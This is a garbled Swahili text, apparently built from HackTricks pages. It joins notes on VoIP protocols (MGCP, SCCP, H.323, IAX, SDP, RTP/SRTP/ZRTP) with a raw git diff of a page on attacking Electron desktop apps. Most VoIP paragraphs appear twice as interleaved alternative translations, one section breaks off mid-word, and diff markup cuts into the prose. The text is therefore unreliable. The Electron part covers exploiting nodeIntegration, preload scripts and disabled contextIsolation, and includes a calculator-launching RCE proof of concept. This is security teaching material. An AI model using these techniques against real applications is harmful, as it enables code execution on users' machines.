1. **Wakala wa Wito au Msimamizi wa Lango la Vyombo vya Habari (MGC)**: Lango kuu katika muundo wa MGCP linawajibika kwa **kusimamia na kudhibiti malango ya vyombo vya habari**. Inashughulikia mchakato wa kuanzisha, kubadilisha, na kumaliza wito. MGC inawasiliana na malango ya vyombo vya habari kwa kutumia itifaki ya MGCP.
2. **Malango ya Vyombo vya Habari (MGs) au Malango ya Watumwa**: Vifaa hivi **hubadilisha mito ya vyombo vya habari ya dijiti kati ya mitandao tofauti**, kama vile simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyobadilishwa kwa pakiti. Yanasimamiwa na MGC na kutekeleza amri zinazopokelewa kutoka kwake. Malango ya vyombo vya habari yanaweza kuwa na kazi kama vile kubadilisha muundo, kufunga kwenye pakiti, na kufuta sauti.
3. **Malango ya Ishara (SGs)**: Malango haya yanawajibika kwa **kubadilisha ujumbe wa ishara kati ya mitandao tofauti**, kuruhusu mawasiliano laini kati ya mifumo ya simu za jadi (k.m., SS7) na mitandao ya IP (k.m., SIP au H.323). Malango ya ishara ni muhimu kwa usanifu wa kazi na kuhakikisha kuwa habari ya kudhibiti wito inawasilishwa ipasavyo kati ya mitandao tofauti.
1. **Mnadaaji wa Simu au Msimamizi wa Geti la Vyombo vya Habari (MGC)**: Geti kuu katika muundo wa MGCP ni jukumu la **kusimamia na kudhibiti geti la vyombo vya habari**. Inashughulikia mchakato wa kuanzisha simu, kubadilisha, na kumaliza simu. MGC inawasiliana na geti la vyombo vya habari kwa kutumia itifaki ya MGCP.
2. **Vyombo vya Habari (MGs) au Geti la Mtumwa**: Vifaa hivi **vinabadilisha mitiririko ya vyombo vya habari vya dijiti kati ya mitandao tofauti**, kama vile simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyosongwa kwa pakiti. Vinasimamiwa na MGC na kutekeleza amri zinazopokelewa kutoka kwake. Vyombo vya habari vinaweza kuwa na kazi kama vile kubadilisha namna ya sauti, kufungasha pakiti, na kufuta sauti.
3. **Geti za Kutia Saini (SGs)**: Geti hizi zinahusika na **kubadilisha ujumbe wa kutia saini kati ya mitandao tofauti**, kuruhusu mawasiliano laini kati ya mifumo ya simu za jadi (k.m., SS7) na mitandao inayotumia IP (k.m., SIP au H.323). Geti za kutia saini ni muhimu kwa uratibu na kuhakikisha kuwa habari ya kudhibiti simu inasambazwa ipasavyo kati ya mitandao tofauti.
Kwa muhtasari, MGCP inaunganisha mantiki ya kudhibiti wito katika wakala wa wito, ambayo inasaidia usimamizi wa malango ya vyombo vya habari na ishara, ikitoa uwezo bora wa kupanuka, kuaminika, na ufanisi katika mitandao ya mawasiliano.
Kwa muhtasari, MGCP inajikita katika mantiki ya kudhibiti simu katika mnadaaji wa simu, ambayo inasaidia usimamizi rahisi wa vyombo vya habari na geti za kutia saini, ikitoa uwezo bora wa kupanuka, uaminifu, na ufanisi katika mitandao ya mawasiliano.
### SCCP (Itifaki ya Udhibiti wa Mteja Mdogo)
### SCCP (Itifaki ya Kudhibiti Mteja Mdogo)
Itifaki ya Udhibiti wa Mteja Mdogo (SCCP) ni **itifaki ya ishara na kudhibiti wito** ya kipekee ya Cisco Systems. Inatumika hasa kwa mawasiliano kati ya **Meneja wa Mawasiliano wa Cisco Unified** (inayojulikana hapo awali kama CallManager) na simu za IP za Cisco au vifaa vingine vya sauti na video vya Cisco.
Itifaki ya Kudhibiti Mteja Mdogo (SCCP) ni **itifaki ya kutia saini na kudhibiti simu** inayomilikiwa na Cisco Systems. Inatumiwa hasa kwa mawasiliano kati ya **Meneja wa Mawasiliano wa Cisco** (inayojulikana hapo awali kama CallManager) na simu za IP za Cisco au vifaa vingine vya sauti na video vya Cisco.
SCCP ni itifaki nyepesi ambayo inasaidia mawasiliano kati ya seva ya kudhibiti wito na vifaa vya mwisho. Inaitwa "Skinny" kwa sababu ya muundo wake mdogo na mahitaji ya kubana kwa upana wa bandari ikilinganishwa na itifaki zingine za VoIP kama H.323 au SIP.
SCCP ni itifaki nyepesi inayosimplisha mawasiliano kati ya seva ya kudhibiti simu na vifaa vya mwisho. Inaitwa "Skinny" kwa sababu ya muundo wake wa kimsingi na mahitaji madogo ya upana wa bandari ikilinganishwa na itifaki zingine za VoIP kama H.323 au SIP.
Sehemu kuu za mfumo uliojengwa kwa kutumia SCCP ni:
Sehemu kuu za mfumo wa SCCP ni:
1. **Seva ya Kudhibiti Wito**: Seva hii, kawaida Meneja wa Mawasiliano wa Cisco Unified, inasimamia mchakato wa kuanzisha, kubadilisha, na kumaliza wito, pamoja na huduma zingine za simu kama kupeleka wito, kuhamisha wito, na kushikilia wito.
2. **Vifaa vya SCCP**: Hivi ni vifaa kama simu za IP, vitengo vya mkutano wa video, au vifaa vingine vya sauti na video vya Cisco ambavyo hutumia SCCP kwa mawasiliano na seva ya kudhibiti wito. Vinaandikishwa na seva, hupokea na kutuma ujumbe wa ishara, na kufuata maagizo yaliyotolewa na seva ya kudhibiti wito kwa kushughulikia wito.
3. **Malango**: Vifaa hivi, kama malango ya sauti au malango ya vyombo vya habari, wanawajibika kwa kubadilisha mito ya vyombo vya habari kati ya mitandao tofauti, kama simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyobadilishwa kwa pakiti. Pia wanaweza kuwa na kazi zaidi kama vile kubadilisha muundo au kufuta sauti.
1. **Seva ya Kudhibiti Simu**: Seva hii, kawaida Meneja wa Mawasiliano wa Cisco, inasimamia mchakato wa kuanzisha simu, kubadilisha, na kumaliza simu, pamoja na huduma zingine za simu kama vile kupeleka simu, kuhamisha simu, na kushikilia simu.
2. **Vifaa vya Mwisho vya SCCP**: Hivi ni vifaa kama simu za IP, vitengo vya mkutano wa video, au vifaa vingine vya sauti na video vya Cisco vinavyotumia SCCP kwa mawasiliano na seva ya kudhibiti simu. Vinajiandikisha kwa seva, kutuma na kupokea ujumbe wa kutia saini, na kufuata maagizo yanayotolewa na seva ya kudhibiti simu kwa usimamizi wa simu.
3. **Geti**: Vifaa hivi, kama vile geti za sauti au vyombo vya habari, wanahusika na kubadilisha mitiririko ya vyombo vya habari kati ya mitandao tofauti, kama vile simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyosongwa kwa pakiti. Vinaweza pia kuwa na kazi zaidi, kama vile kubadilisha namna ya sauti au kufuta sauti.
SCCP inatoa njia rahisi na ufanisi ya mawasiliano kati ya seva za kudhibiti wito za Cisco na vifaa vya mwisho. Walakini, ni muhimu kutambua kuwa **SCCP ni itifaki ya kipekee**, ambayo inaweza kuzuia uwezo wa kufanya kazi pamoja na mifumo au vifaa visivyo vya Cisco. Katika kesi kama hizo, itifaki zingine za kawaida za VoIP kama SIP zinaweza kuwa chaguo bora.
SCCP inatoa njia rahisi na ufanisi wa mawasiliano kati ya seva za kudhibiti simu za Cisco na vifaa vya mwisho. Walakini, ni muhimu kutambua kwamba **SCCP ni itifaki ya kipekee**, ambayo inaweza kuzuia uratibu na mifumo au vifaa visivyo vya Cisco. Katika kesi kama hizo, itifaki zingine za VoIP za viwango kama SIP zinaweza kuwa chaguo bora zaidi.
### H.323
H.323 ni **mkusanyiko wa itifaki** za mawasiliano ya multimedia, ikiwa ni pamoja na sauti, video, na mikutano ya data juu ya mitandao iliyobadilishwa kwa pakiti, kama vile mitandao ya IP. Iliendelezwa na **Shirika la Mawasiliano la Kimataifa** (ITU-T) na hutoa mfumo kamili wa kusimamia vikao vya mawasiliano ya multimedia.
H.323 ni **mkusanyo wa itifaki** za mawasiliano ya multimedia, ikiwa ni pamoja na sauti, video, na mikutano ya data juu ya mitandao iliyosongwa kwa pakiti, kama vile mitandao inayotumia IP. Iliundwa na **Shirika la Kimataifa la Mawasiliano** (ITU-T) na hutoa mfumo kamili wa kusimamia vikao vya mawasiliano ya multimedia.
Baadhi ya sehemu muhimu za mkusanyiko wa H.323 ni pamoja na:
Baadhi ya sehemu muhimu za mkusanyo wa H.323 ni pamoja na:
1. **Vifaa vya Mwisho**: Hivi ni vifaa vya mwisho, kama simu za IP, mifumo ya mkutano wa video, au programu za programu, ambazo zinasaidia H.323 na zinaweza kushiriki katika vikao vya m
## Itifaki za Uhamishaji na Usafirishaji
1. **Vifaa vya Mwisho**: Hivi ni vifaa vya mwisho, kama vile simu za IP, mifumo ya mkutano wa video, au programu za programu, ambazo zinasaidia H.323 na zinaweza kushiriki katika vikao vya mawasiliano ya multimedia.
2. **Geti**: Vifaa hivi vinabadilisha mitiririko ya vyombo vya habari kati ya mitandao tofauti, kama vile simu za jadi zilizounganishwa kwa mzunguko na mitandao ya IP iliyosongwa kwa pakiti, kuruhusu uratibu kati ya H.323 na mifumo mingine ya mawasiliano. Vinaweza pia kuwa na kazi zaidi, kama vile kubadilisha namna ya sauti au kufuta sauti.
3. **Walinzi wa Geti**: Hizi ni sehemu za hiari zinazotoa huduma za kudhibiti simu na usimamizi katika mtandao wa H.323. Hufanya kazi kama vile tafsiri ya anwani, usimamizi wa upana wa bandari, na kudhibiti idhini, kusaidia katika usimamizi na optimization ya rasilimali za mtandao.
4. **Vifaa vya Udhibiti wa Multipoint (MCUs)**: Vifaa hivi huwezesha mikutano ya multipoint kwa kusimamia na kuchanganya mitiririko ya vyombo vya habari kutoka kwa vifaa vingi vya mwisho. MCUs huwezesha huduma kama vile kudhibiti mpangilio wa video, kubadilisha sauti kulingana na sauti, na uwepo endelevu, kuruhusu kuandaa mikutano kubwa na washiriki wengi.
H.323 inasaidia anuwai ya kodeki za sauti na video, pamoja na huduma zingine za ziada kama vile kupeleka simu, kuhamisha simu, kushikilia simu, na kusubiri simu. Licha ya kupokelewa kwa kiasi kikubwa katika siku za mwanzo za VoIP, H.323 imeanza kubadilishwa polepole na itifaki za kisasa na zenye ufanisi zaidi kama **Itifaki ya Kuanzisha Kikao (SIP)**, ambayo inatoa uratibu bora na utekelezaji rahisi. Walakini, H.323 bado inatumika katika mifumo mingi ya zamani na inaendelea kusaidiwa na wauzaji mbalimbali wa vifaa.
### IAX (Inter Asterisk eXchange)
IAX (Inter-Asterisk eXchange) ni **itifaki ya kutia saini na kudhibiti simu** inayotumiwa hasa kwa mawasiliano kati ya seva za Asterisk PBX (Private Branch Exchange) na vifaa vingine vya VoIP. Iliundwa na Mark Spencer, mwanzilishi wa programu ya Asterisk PBX ya chanzo wazi, kama mbadala kwa itifaki zingine za VoIP kama SIP na H.323.
IAX inajulikana kwa **urahisi, ufanisi, na urahisi wa utekelezaji**. Baadhi ya sifa muhimu za IAX ni pamoja na:
1. **Bandari Moja ya UDP**: IAX hutumia bandari moja ya UDP (4569) kwa mawasiliano ya kutia saini na vyombo vya habari, ambayo inasimplisha kupitisha kizuizi cha firewall na NAT, ikifanya iwe rahisi kupeleka katika mazingira mbalimbali ya mtandao.
2. **Itifaki ya Binary**: Tofauti na itifaki zinazotumia maandishi kama SIP, IAX ni itifaki ya binary, ambayo inapunguza matumizi yake ya upana wa bandari na kufanya iwe ufanisi zaidi katika kutuma data ya kutia saini na vyombo vya habari.
3. **Trunking**: IAX inasaidia trunking, ambayo inaruhusu simu nyingi kuunganishwa katika muunganisho mmoja wa mtandao, kupunguza gharama za ziada na kuboresha matumizi ya upana wa bandari.
4. **Ufichaji wa Asili**: IAX ina msaada wa kujengwa kwa ufichaji, ikitumia mbinu kama RSA kwa kubadilishana funguo na AES kwa ufichaji wa vyombo vya habari, kutoa mawasiliano salama kati ya vituo.
5. **Mawasiliano ya Mwenzake kwa Mwenzake**: IAX inaweza kutumika kwa mawasiliano moja kwa moja kati ya vituo bila haja ya seva kuu, ikiruhusu mchakato rahisi na ufanisi zaidi wa kupangilia simu.
Licha ya faida zake, IAX ina baadhi ya mapungufu, kama vile kuzingatia kuu kwa mazingira ya Asterisk na kupokea kwa kiasi kidogo ikilinganishwa na itifaki zilizothibitishwa zaidi kama SIP. Kama matokeo, IAX huenda sio chaguo bora kwa uratibu na mifumo au vifaa visivyo vya Asterisk. Walakini, kwa wale wanaofanya kazi ndani ya mazingira ya Asterisk, IAX inatoa suluhisho imara na ufanisi kwa mawasiliano ya VoIP.
## Itifaki za Usafirishaji na Usafirishaji
### SDP (Itifaki ya Maelezo ya Kikao)
SDP (Itifaki ya Maelezo ya Kikao) ni **muundo wa maandishi** unaotumika kuelezea sifa za vikao vya multimedia, kama sauti, video, au mikutano ya data, juu ya mtandao wa IP. Iliundwa na **Internet Engineering Task Force (IETF)** na imefafanuliwa katika **RFC 4566**. SDP haishughulikii uhamishaji halisi wa media au kuanzisha kikao, lakini hutumiwa pamoja na itifaki zingine za ishara, kama vile **SIP (Itifaki ya Kuanzisha Kikao)**, kujadiliana na kubadilishana habari kuhusu mitiririko ya media na sifa zake.
SDP (Itifaki ya Maelezo ya Kikao) ni **muundo wa maandishi** unaotumika kuelezea sifa za vikao vya multimedia, kama sauti, video, au mikutano ya data, juu ya mitandao ya IP. Iliundwa na **Internet Engineering Task Force (IETF)** na inafafanuliwa katika **RFC 4566**. SDP haitumii usafirishaji halisi wa media au kuanzisha kikao lakini hutumiwa pamoja na itifaki zingine za ishara, kama **SIP (Itifaki ya Kuanzisha Kikao)**, kujadiliana na kubadilishana habari kuhusu mito ya media na sifa zao.
Baadhi ya vipengele muhimu vya SDP ni pamoja na:
1. **Maelezo ya Kikao**: SDP inaelezea maelezo ya kikao cha multimedia, ikiwa ni pamoja na jina la kikao, maelezo ya kikao, wakati wa kuanza, na wakati wa kumaliza.
2. **Mitiririko ya Media**: SDP inafafanua sifa za mitiririko ya media, kama vile aina ya media (sauti, video, au maandishi), itifaki ya usafirishaji (k.m., RTP au SRTP), na muundo wa media (k.m., habari za codec).
1. **Maelezo ya Kikao**: SDP inaelezea maelezo ya kikao cha multimedia, ikiwa ni pamoja na jina la kikao, maelezo ya kikao, wakati wa kuanza, na wakati wa mwisho.
2. **Mito ya Media**: SDP inafafanua sifa za mito ya media, kama aina ya media (sauti, video, au maandishi), itifaki ya usafirishaji (k.m., RTP au SRTP), na muundo wa media (k.m., habari za codec).
3. **Maelezo ya Uunganisho**: SDP hutoa habari kuhusu anwani ya mtandao (anwani ya IP) na nambari ya bandari ambapo media inapaswa kutumwa au kupokelewa.
4. **Sifa**: SDP inasaidia matumizi ya sifa kutoa habari ziada, za hiari kuhusu kikao au mtiririko wa media. Sifa zinaweza kutumika kwa kutoa vipengele mbalimbali kama vile funguo za kusimbwa, mahitaji ya wigo wa bandari, au mifumo ya kudhibiti media.
4. **Vipengele**: SDP inasaidia matumizi ya vipengele kutoa habari ya ziada, hiari kuhusu kikao au mto wa media. Vipengele vinaweza kutumika kwa kufafanua vipengele mbalimbali kama vile funguo za kuchakata, mahitaji ya upana wa bandari, au mbinu za kudhibiti media.
SDP kawaida hutumiwa katika mchakato ufuatao:
1. Chama kinachoanzisha kikao hujenga maelezo ya SDP ya kikao cha multimedia kinachopendekezwa, ikiwa ni pamoja na maelezo ya mitiririko ya media na sifa zake.
2. Maelezo ya SDP yanatumwa kwa chama kinachopokea, kawaida yakiwa yamejumuishwa ndani ya ujumbe wa itifaki ya ishara kama vile SIP au RTSP.
3. Chama kinachopokea huprocess maelezo ya SDP, na kulingana na uwezo wake, kinaweza kukubali, kukataa, au kubadilisha kikao kilichopendekezwa.
4. Maelezo ya mwisho ya SDP yanatumwa kwa chama kinachoanzisha kama sehemu ya ujumbe wa itifaki ya ishara, kukamilisha mchakato wa majadiliano.
1. Chama cha kuanzisha hujenga maelezo ya SDP ya kikao cha multimedia kilichopendekezwa, ikiwa ni pamoja na maelezo ya mito ya media na sifa zao.
2. Maelezo ya SDP hutumwa kwa chama cha kupokea, kawaida imejumuishwa ndani ya ujumbe wa itifaki ya ishara kama SIP au RTSP.
3. Chama cha kupokea huprocess maelezo ya SDP, na kulingana na uwezo wake, inaweza kukubali, kukataa, au kurekebisha kikao kilichopendekezwa.
4. Maelezo ya mwisho ya SDP hutumwa kwa chama cha kuanzisha kama sehemu ya ujumbe wa itifaki ya ishara, kukamilisha mchakato wa majadiliano.
Urahisi na uwezo wa kubadilika wa SDP hufanya iwe kiwango kinachokubalika sana kwa kuelezea vikao vya multimedia katika mifumo mbalimbali ya mawasiliano, ikicheza jukumu muhimu katika kuanzisha na kusimamia vikao vya multimedia halisi kwenye mtandao wa IP.
Urahisi na uwezo wa kubadilika wa SDP hufanya iwe kiwango kilichokubaliwa sana kwa kuelezea vikao vya multimedia katika mifumo mbalimbali ya mawasiliano, ikicheza jukumu muhimu katika kuanzisha na kusimamia vikao vya multimedia halisi kwenye mitandao ya IP.
### RTP / RTCP / SRTP / ZRTP
1. **RTP (Itifaki ya Usafirishaji Halisi wa Waktu)**: RTP ni itifaki ya mtandao iliyoundwa kwa utoaji wa data ya sauti na video, au media halisi wakati mwingine, juu ya mtandao wa IP. Iliyoundwa na **IETF** na kufafanuliwa katika **RFC 3550**, RTP mara nyingi hutumiwa na itifaki za ishara kama vile SIP na H.323 kuwezesha mawasiliano ya multimedia. RTP hutoa mbinu za **synchronization**, **sequencing**, na **timestamping** ya mitiririko ya media, ikisaidia kuhakikisha upigaji wa media ulio laini na kwa wakati unaofaa.
2. **RTCP (Itifaki ya Kudhibiti Usafirishaji Halisi wa Waktu)**: RTCP ni itifaki ya rafiki ya RTP, inayotumika kwa kufuatilia ubora wa huduma (QoS) na kutoa maoni kuhusu usafirishaji wa mitiririko ya media. Iliyofafanuliwa katika **RFC 3550** sawa na RTP, RTCP **hutumia pakiti za kudhibiti kubadilishana kwa kipindi kati ya washiriki katika kikao cha RTP**. Inashiriki habari kama vile upotezaji wa pakiti, jitter, na wakati wa raundi, ambayo husaidia katika kutambua na kuzoea hali za mtandao, kuboresha ubora wa jumla wa media.
3. **SRTP (Itifaki ya Usafirishaji Halisi Salama wa Waktu)**: SRTP ni nyongeza ya RTP ambayo hutoa **kusimbwa**, **uthibitishaji wa ujumbe**, na **ulinzi dhidi ya kurudia** kwa mitiririko ya media, ikisimamia usafirishaji salama wa data nyeti ya sauti na video. Iliyofafanuliwa katika **RFC 3711**, SRTP hutumia algorithm za kriptografia kama AES kwa kusimbwa na HMAC-SHA1 kwa uthibitishaji wa ujumbe. SRTP mara nyingi hutumiwa kwa pamoja na itifaki salama za ishara kama vile SIP juu ya TLS kutoa usalama wa mwisho hadi mwisho katika mawasiliano ya multimedia.
4. **ZRTP (Itifaki ya Usafirishaji Halisi wa Waktu ya Zimmermann)**: ZRTP ni itifaki ya makubaliano ya kriptografia ambayo hutoa **kusimbwa mwisho hadi mwisho** kwa mitiririko ya media ya RTP. Iliyoundwa na Phil Zimmermann, muundaji wa PGP, ZRTP inaelezewa katika **RFC 6189**. Tofauti na SRTP, ambayo inategemea itifaki za ishara kwa kubadilishana funguo, ZRTP imeundwa kufanya kazi bila kuhitaji itifaki ya ishara. Inatumia **kubadilishana kwa funguo za Diffie-Hellman** kuweka siri iliyoshirikiwa kati ya vyama vinavyoongea, bila kuhitaji uaminifu wa awali au miundombinu ya ufunguo wa umma (PKI). ZRTP pia inajumuisha vipengele kama **Vidokezo vifupi vya Uthibitishaji (SAS)** kulinda dhidi ya mashambulizi ya mtu katikati.
1. **RTP (Itifaki ya Usafirishaji wa Moja kwa Moja)**: RTP ni itifaki ya mtandao iliyoundwa kwa utoaji wa data ya sauti na video, au media halisi wakati mwingine, juu ya mitandao ya IP. Iliundwa na **IETF** na kufafanuliwa katika **RFC 3550**, RTP mara nyingi hutumiwa na itifaki za ishara kama SIP na H.323 kuwezesha mawasiliano ya multimedia. RTP hutoa mbinu za **synchronization**, **sequencing**, na **timestamping** ya mito ya media, ikisaidia kuhakikisha uchezaji wa media laini na wa wakati unaofaa.
2. **RTCP (Itifaki ya Kudhibiti Usafirishaji wa Moja kwa Moja)**: RTCP ni itifaki mshirika wa RTP, hutumika kwa ufuatiliaji wa ubora wa huduma (QoS) na kutoa maoni kuhusu usafirishaji wa mito ya media. Imefafanuliwa katika **RFC 3550** sawa na RTP, RTCP **hutumia kubadilishana pakiti za kudhibiti kati ya washiriki katika kikao cha RTP**. Inashiriki habari kama upotevu wa pakiti, jitter, na muda wa safari ya pande zote, ambayo husaidia katika kutambua na kuzoea hali za mtandao, kuboresha ubora wa jumla wa media.
3. **SRTP (Itifaki ya Usafirishaji Salama wa Moja kwa Moja)**: SRTP ni upanuzi wa RTP ambao hutoa **encryption**, **uthibitisho wa ujumbe**, na **ulinzi dhidi ya kurudia** kwa mito ya media, ikihakikisha usafirishaji salama wa data nyeti ya sauti na video. Imefafanuliwa katika **RFC 3711**, SRTP hutumia mbinu za kryptografia kama AES kwa encryption na HMAC-SHA1 kwa uthibitisho wa ujumbe. SRTP mara nyingi hutumiwa pamoja na itifaki za ishara salama kama SIP juu ya TLS kutoa usalama mwisho hadi mwisho katika mawasiliano ya multimedia.
4. **ZRTP (Itifaki ya Usafirishaji wa Moja kwa Moja ya Zimmermann)**: ZRTP ni itifaki ya makubaliano ya funguo ya kryptografia ambayo hutoa **encryption mwisho hadi mwisho** kwa mito ya media ya RTP. Iliyoundwa na Phil Zimmermann, mwumbaji wa PGP, ZRTP inaelezwa katika **RFC 6189**. Tofauti na SRTP, ambayo inategemea itifaki za ishara kwa kubadilishana funguo, ZRTP imeundwa kufanya kazi bila kutegemea itifaki ya ishara. Inatumia **Diffie-Hellman key exchange** kuanzisha siri iliyoshirikiwa kati ya vyama vinavyoongea, bila kuhitaji imani ya awali au miundombinu ya funguo ya umma (PKI). ZRTP pia inajumuisha vipengele kama **Short Authentication Strings (SAS)** kulinda dhidi ya mashambulizi ya mtu katikati.
Itifaki hizi zina jukumu muhimu katika **utoaji na usalama wa mawasiliano ya multimedia halisi wakati mwingine juu ya mtandao wa IP**. Wakati RTP na RTCP hushughulikia uhamishaji halisi wa media na ufuatiliaji wa ubora, SRTP na ZRTP huhakikisha kuwa media iliyotumwa inalindwa dhidi ya kusikiliza, kubadilisha, na mashambulizi ya kurudia.
Itifaki hizi zina jukumu muhimu katika **utoaji na kuhakikisha usalama wa mawasiliano ya multimedia halisi kwenye mitandao ya IP**. Wakati RTP na RTCP hushughulikia usafirishaji halisi wa media na ufuatiliaji wa ubora, SRTP na ZRTP huhakikisha kuwa media iliyotumwa inalindwa dhidi ya kusikiliza, kuhariri, na mashambulizi ya kurudia.

View file

@ -1,29 +1,43 @@
# Programu za Kompyuta za Electron
# Programu za Kompyuta za Meza za Electron
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJISAJILI**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wamedukuliwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Utangulizi
Electron inachanganya seva ya ndani (na **NodeJS**) na sehemu ya mbele (**Chromium**), ingawa inakosa baadhi ya mifumo ya usalama ya vivinjari vya kisasa.
Electron inachanganya seva ya ndani (na **NodeJS**) na mbele (**Chromium**), ingawa inakosa baadhi ya mifumo ya usalama ya vivinjari vya kisasa.
Kawaida unaweza kupata msimbo wa programu ya electron ndani ya programu ya `.asar`, ili kupata msimbo unahitaji kuutoa:
```bash
npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file
```
Katika msimbo wa chanzo wa programu ya Electron, ndani ya `packet.json`, unaweza kupata `main.js` faili ambapo mipangilio ya usalama imewekwa.
Katika msimbo wa chanzo wa programu ya Electron, ndani ya `packet.json`, unaweza kupata `main.js` ambapo mipangilio ya usalama imewekwa.
```json
{
"name": "standard-notes",
@ -32,11 +46,11 @@ Katika msimbo wa chanzo wa programu ya Electron, ndani ya `packet.json`, unaweza
Electron ina aina 2 za michakato:
* Michakato ya Kuu (ina ufikivu kamili wa NodeJS)
* Michakato ya Mchoraji (inapaswa kuwa na ufikivu mdogo wa NodeJS kwa sababu za usalama)
* Michakato ya Mwonekano (inapaswa kuwa na ufikivu mdogo wa NodeJS kwa sababu za usalama)
![](<../../../.gitbook/assets/image (179).png>)
Mchakato wa **mchoraji** utakuwa dirisha la kivinjari linalopakia faili:
Mchakato wa **mwonekano** utakuwa dirisha la kivinjari linalopakia faili:
```javascript
const {BrowserWindow} = require('electron');
let win = new BrowserWindow();
@ -44,17 +58,17 @@ let win = new BrowserWindow();
//Open Renderer Process
win.loadURL(`file://path/to/index.html`);
```
Mipangilio ya **mchakato wa renderer** inaweza **kusanidiwa** katika **mchakato wa msingi** ndani ya faili ya main.js. Baadhi ya mipangilio itazuia programu ya Electron kupata RCE au mapungufu mengine ikiwa **mipangilio imewekwa kwa usahihi**.
Mipangilio ya **mchakato wa renderer** inaweza **kusanidiwa** katika **mchakato wa msingi** ndani ya faili ya main.js. Baadhi ya mipangilio itazuia programu ya Electron kupata RCE au vulnerabilities nyingine ikiwa **mipangilio imewekwa kwa usahihi**.
Programu ya electron **inaweza kupata kifaa** kupitia apis za Node ingawa inaweza kusanidiwa kuzuia hilo:
* **`nodeIntegration`** - ni `off` kwa chaguo-msingi. Ikiwa ni `on`, inaruhusu kupata vipengele vya node kutoka kwa mchakato wa renderer.
* **`nodeIntegration`** - ni `off` kwa chaguo-msingi. Ikiwa ni `on`, inaruhusu kupata vipengele vya Node kutoka kwa mchakato wa renderer.
* **`contextIsolation`** - ni `on` kwa chaguo-msingi. Ikiwa ni `off`, mchakato wa msingi na renderer hawajaachanishwa.
* **`preload`** - tupu kwa chaguo-msingi.
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - ni off kwa chaguo-msingi. Itazuia vitendo ambavyo NodeJS inaweza kutekeleza.
* Ushirikiano wa Node katika Wafanyikazi
* **`nodeIntegrationInSubframes`** - ni `off` kwa chaguo-msingi.
* Ikiwa **`nodeIntegration`** ime **wezeshwa**, hii itaruhusu matumizi ya **Node.js APIs** kwenye kurasa za wavuti zilizopakiwa kwenye iframes ndani ya programu ya Electron.
* Ikiwa **`nodeIntegration`** ime **wezeshwa**, hii itaruhusu matumizi ya **Node.js APIs** katika kurasa za wavuti ambazo zimeloadiwa kwenye iframes ndani ya programu ya Electron.
* Ikiwa **`nodeIntegration`** ime **lemazwa**, basi preloads zitapakia kwenye iframe
Mfano wa usanidi:
@ -123,7 +137,7 @@ top.require('child_process').exec('open /System/Applications/Calculator.app');
## RCE: preload
Skripti iliyoorodheshwa katika mipangilio hii ina**ngia kabla ya skripti nyingine kwenye renderer**, hivyo ina **upatikanaji usio na kikomo wa Node APIs**:
Skripti iliyotajwa katika mazingira haya ina**l**oaded kabla ya skripti zingine kwenye renderer**, hivyo ina **upatikanaji usio na kikomo wa Node APIs**:
```javascript
new BrowserWindow{
webPreferences: {
@ -132,7 +146,7 @@ preload: _path2.default.join(__dirname, 'perload.js'),
}
});
```
Kwa hivyo, script inaweza kuuza node-features kwa kurasa:
Kwa hivyo, scripti inaweza kuuza node-features kwa kurasa:
{% code title="preload.js" %}
```javascript
@ -160,13 +174,13 @@ runCalc();
## RCE: XSS + contextIsolation
_**contextIsolation**_ inaleta **muktadha uliogawanyika kati ya skripti za ukurasa wa wavuti na msimbo wa ndani wa JavaScript wa Electron** ili utekelezaji wa JavaScript wa kila msimbo usiathiri mwingine. Hii ni sifa muhimu ya kufuta uwezekano wa RCE.
_**contextIsolation**_ inaleta **muktadha uliogawanyika kati ya skripti za ukurasa wa wavuti na msimbo wa ndani wa JavaScript wa Electron** ili utekelezaji wa JavaScript wa kila msimbo usiathiri kila mmoja. Hii ni sifa muhimu ya kufuta uwezekano wa RCE.
Ikiwa muktadha haujatengwa, mkaidi anaweza:
1. Kutekeleza **JavaScript ya kupindukia kwenye renderer** (XSS au kuhamia kwenye tovuti za nje)
